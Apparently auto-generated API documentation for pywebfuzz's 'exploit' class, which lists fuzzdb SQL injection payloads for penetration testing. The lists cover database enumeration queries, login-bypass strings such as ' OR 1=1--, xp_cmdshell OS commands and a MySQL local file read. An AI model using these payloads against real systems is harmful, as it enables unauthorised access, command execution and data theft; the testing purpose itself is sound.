Package pywebfuzz :: Module fuzzdb :: Class attack_payloads :: Class sql_injection :: Class exploit
[hide private]
[frames] | no frames]

Class exploit

This implements the exploit class of payloads from fuzzdb

Class Variables [hide private]
  db2_enumeration = ['select versionnumber, version_timestamp fr...
  ms_sql_enumeration = ['select @@version', 'select @@servername...
  mysql_injection_login_bypass = ['<username>\' OR 1=1--', '\'OR...
  mysql_read_local_files = ['create table myfile (input TEXT); l...
  location = '/data/attack-payloads/sql-injection/exploit/postgr...
  postgres_enumeration = ['select version();', 'select current_d...
Class Variable Details [hide private]

db2_enumeration

Value:
['select versionnumber, version_timestamp from sysibm.sysversions;',
 'select user from sysibm.sysdummy1;',
 'select session_user from sysibm.sysdummy1;',
 'select system_user from sysibm.sysdummy1;',
 'select current server from sysibm.sysdummy1;',
 'select name from sysibm.systables;',
 'select grantee from syscat.dbauth;',
 'select * from syscat.tabauth;',
...

ms_sql_enumeration

Value:
['select @@version',
 'select @@servernamee',
 'select @@microsoftversione',
 'select * from master..sysserverse',
 'select * from sysusers',
 'exec master..xp_cmdshell \'ipconfig+/all\'',
 'exec master..xp_cmdshell \'net+view\'',
 'exec master..xp_cmdshell \'net+users\'',
...

mysql_injection_login_bypass

Value:
['<username>\' OR 1=1--',
 '\'OR \'\' = \'\tAllows authentication without a valid username.',
 '<username>\'--',
 '\' union select 1, \'<user-fieldname>\', \'<pass-fieldname>\' 1--',
 '\'OR 1=1--']

mysql_read_local_files

Value:
['create table myfile (input TEXT); load data infile \'<filepath>\' in\
to table myfile; select * from myfile;']

location

Value:
'/data/attack-payloads/sql-injection/exploit/postgres-enumeration.txt'

postgres_enumeration

Value:
['select version();',
 'select current_database();',
 'select current_user;',
 'select session_user;',
 'select current_setting(\'log_connections\');',
 'select current_setting(\'log_statement\');',
 'select current_setting(\'port\');',
 'select current_setting(\'password_encryption\');',
...